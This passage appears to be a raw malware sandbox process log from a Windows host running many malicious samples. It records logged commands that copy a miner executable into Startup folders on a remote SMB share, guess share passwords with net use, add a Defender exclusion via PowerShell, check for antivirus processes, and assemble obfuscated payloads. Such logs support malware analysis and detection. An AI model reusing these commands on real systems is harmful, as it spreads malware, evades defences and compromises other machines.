Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
C:\Windows\SysWOW64\net.exe
net view
C:\Windows\SysWOW64\find.exe
find /i "\\"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\caspol.exe"
C:\Users\Admin\Desktop\a\caspol.exe
"C:\Users\Admin\Desktop\a\caspol.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\gagagggagagag.exe
"C:\Users\Admin\Desktop\Files\gagagggagagag.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dk.cmd" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe
"C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe"
C:\Users\Admin\Desktop\Files\frap.exe
"C:\Users\Admin\Desktop\Files\frap.exe"
C:\Users\Admin\Desktop\Files\._cache_frap.exe
"C:\Users\Admin\Desktop\Files\._cache_frap.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 9600 -ip 9600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9600 -s 1468
C:\Users\Admin\Desktop\Files\main.exe
"C:\Users\Admin\Desktop\Files\main.exe"
C:\Users\Admin\Desktop\Files\main.exe
"C:\Users\Admin\Desktop\Files\main.exe"
C:\Windows\SysWOW64\ARP.EXE
arp -a
C:\Windows\SysWOW64\find.exe
find /i " 1"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\136.243.76.21|find /i " "
C:\Windows\SysWOW64\net.exe
net view \\136.243.76.21
C:\Windows\SysWOW64\find.exe
find /i " "
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\findstr.exe
findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\system32\cmd.exe
cmd /c md 217412
C:\Windows\system32\findstr.exe
findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper
C:\Windows\system32\cmd.exe
cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
Possibly.pif N
C:\Windows\system32\choice.exe
choice /d y /t 5
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe
"C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe"
C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe
"C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\net.exe
net use * /delete /y
C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\C$ /delete /y
C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\system32\cmd.exe
cmd /c md 29442
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
Reynolds.com l
C:\Windows\system32\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 9288 -ip 9288
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 9288 -s 512
C:\Users\Admin\Desktop\Files\whiteheroin.exe
"C:\Users\Admin\Desktop\Files\whiteheroin.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\Desktop\Files\LummaC222222.exe
"C:\Users\Admin\Desktop\Files\LummaC222222.exe"
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
C:\Users\Admin\Desktop\Files\install_lodop32.exe
"C:\Users\Admin\Desktop\Files\install_lodop32.exe"
C:\Users\Admin\Desktop\Files\Bluescreen.exe
"C:\Users\Admin\Desktop\Files\Bluescreen.exe"
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Users\Admin\Desktop\Files\LummaC2.exe
"C:\Users\Admin\Desktop\Files\LummaC2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Users\Admin\Desktop\Files\Sniffthem.exe
"C:\Users\Admin\Desktop\Files\Sniffthem.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\IMG001.exe" "
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\Users /delete /y
C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 2556 -ip 2556
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2556 -s 184
C:\Users\Admin\Desktop\Files\build2.exe
"C:\Users\Admin\Desktop\Files\build2.exe"
C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe
"C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe"
C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"
C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\C$ "1" /user:"1"
C:\Users\Admin\Desktop\Files\Installeraus.exe
"C:\Users\Admin\Desktop\Files\Installeraus.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\Users "1" /user:"1"
C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\C$ "123" /user:"1"
C:\Users\Admin\Desktop\Files\needmoney.exe
"C:\Users\Admin\Desktop\Files\needmoney.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\Users "123" /user:"1"
C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
C:\Users\Admin\Desktop\Files\scheduledllama.exe
"C:\Users\Admin\Desktop\Files\scheduledllama.exe"
C:\Users\Admin\Desktop\Files\DEF.exe
"C:\Users\Admin\Desktop\Files\DEF.exe"
C:\ProgramData\db\music.exe
"C:\ProgramData\db\music.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\C$ "1" /user:"1"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\Users "1" /user:"1"
C:\Users\Admin\Desktop\Files\ewrvuh.exe
"C:\Users\Admin\Desktop\Files\ewrvuh.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
C:\Users\Admin\Desktop\Files\octus.exe
"C:\Users\Admin\Desktop\Files\octus.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Windows\SysWOW64\net.exe
net use \\136.243.76.21\C$ "0205" /user:"1"
